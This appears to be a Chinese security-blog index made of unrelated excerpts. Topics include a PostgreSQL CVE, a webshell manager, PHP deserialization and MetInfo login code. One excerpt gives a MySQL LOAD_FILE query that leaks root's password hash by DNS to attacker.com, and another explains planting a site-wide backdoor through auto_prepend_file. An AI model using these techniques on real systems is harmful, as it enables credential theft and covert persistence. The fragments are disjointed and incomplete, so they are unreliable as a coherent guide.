背景

在一次对某客户的检测过程中，发现了一个由Spring应用开发程序员错误书写代码导致的安全问题。过后对该漏洞进行相应的研究，了解此漏洞背景知识是要先了解基础的MVC开发模式。

Postgresql 设计缺陷CVE-2018-1058 漏洞分析

漏洞描述

2018年3月1日，PostgreSQL全球开发团队发布了多个系列版本的PostgreSQL安全升级。此次升级修复了CVE-2018-1058，该漏洞可以攻击者“劫持”PostgreSQL数据库的函数，从而使高权限用户在不知情的情况下，执行攻击者设定的恶意SQL语句。

X86-64 Register

Simple Demo 1

知己知彼，百战不殆-孙子

前言

一直以来在网上域渗透的资料，几乎专注的都是一些命令，以及一些工具的使用，但是缺乏对活动目录以及与域本身的安全的研究思考。

Raindrop

1.Raindrop是什么?

Raindrop是一款将来可以跨平台的网站管理工具

2.为什么要开发？

首先一直觉得MacOS下没有像中国菜刀那样非常好用的服务器管理工具。
想要进行服务器管理，经常需要开虚拟机来使用菜刀，感觉非常不方便。

其次，在用过其他人开发的类似软件，例如*斧/*剑。感觉其功能性并未达到自己的需求，所以干脆自己写一个来用吧！

几天前和朋友在测试一个注入，想要使用MySQL通过load_file()函数，再由DNS查询传出注入出来的数据时候遇到的问题

以下语句

1

SELECT LOAD_FILE(CONCAT('\\\\',(SELECT password FROM mysql.user WHERE user='root' LIMIT 1),'.attacker.com\\foobar'));

只有Windows + MySQL才能成功通过DNS查询包传出我们想要的数据

而在*nix + MySQL环境下是无法成功的。

（大家可以试试）

这是为什么呢，我探究了一下背后的原理

文件：admin/login/login_check.php：26行

1
2
3
4
5
6
7
8
9
10
11
12
13

if($action=="login"){
$metinfo_admin_name     = $login_name;
$metinfo_admin_pass     = $login_pass;
$metinfo_admin_pass=md5($metinfo_admin_pass);
/*code*/
if($met_login_code==1){
require_once $depth.'../include/captcha.class.php';
$Captcha= new  Captcha();
if(!$Captcha->CheckCode($code)){
echo("<script type='text/javascript'>alert('$lang_logincodeerror');location.href='login.php?langset=$langset';</script>");
exit;
}
}

什么是序列化以及反序列化？

序列化是将PHP中的值（zval）转换成一段包含字节流的字符串。 序列化一个对象会保存对象的所有变量的值，但是不会保存对象的方法，只会保存类的名字。

反序列化：对单一的已序列化的变量进行操作，将其转换回 PHP 的值（zval）。

今天群里面的一位小伙伴问我关于PHP变量中refcount的问题，当时回答给他了，发现自己没注意到一个细节，记录下来。

今天在看TIPI的时候读到了$PHP_SRC/main/php_globals.h里面全局变量宏中全局变量是通过php.ini来加载赋值的。
里面有两个值[图1]

1
2

char *auto_append_file;
char *auto_prepend_file;

这两个可以在主文件之前自动解析。
那么就可以通过增加这两个值实现在其他文件夹放入我们的后门文件，并且在网站的任何一个目录用这个后门.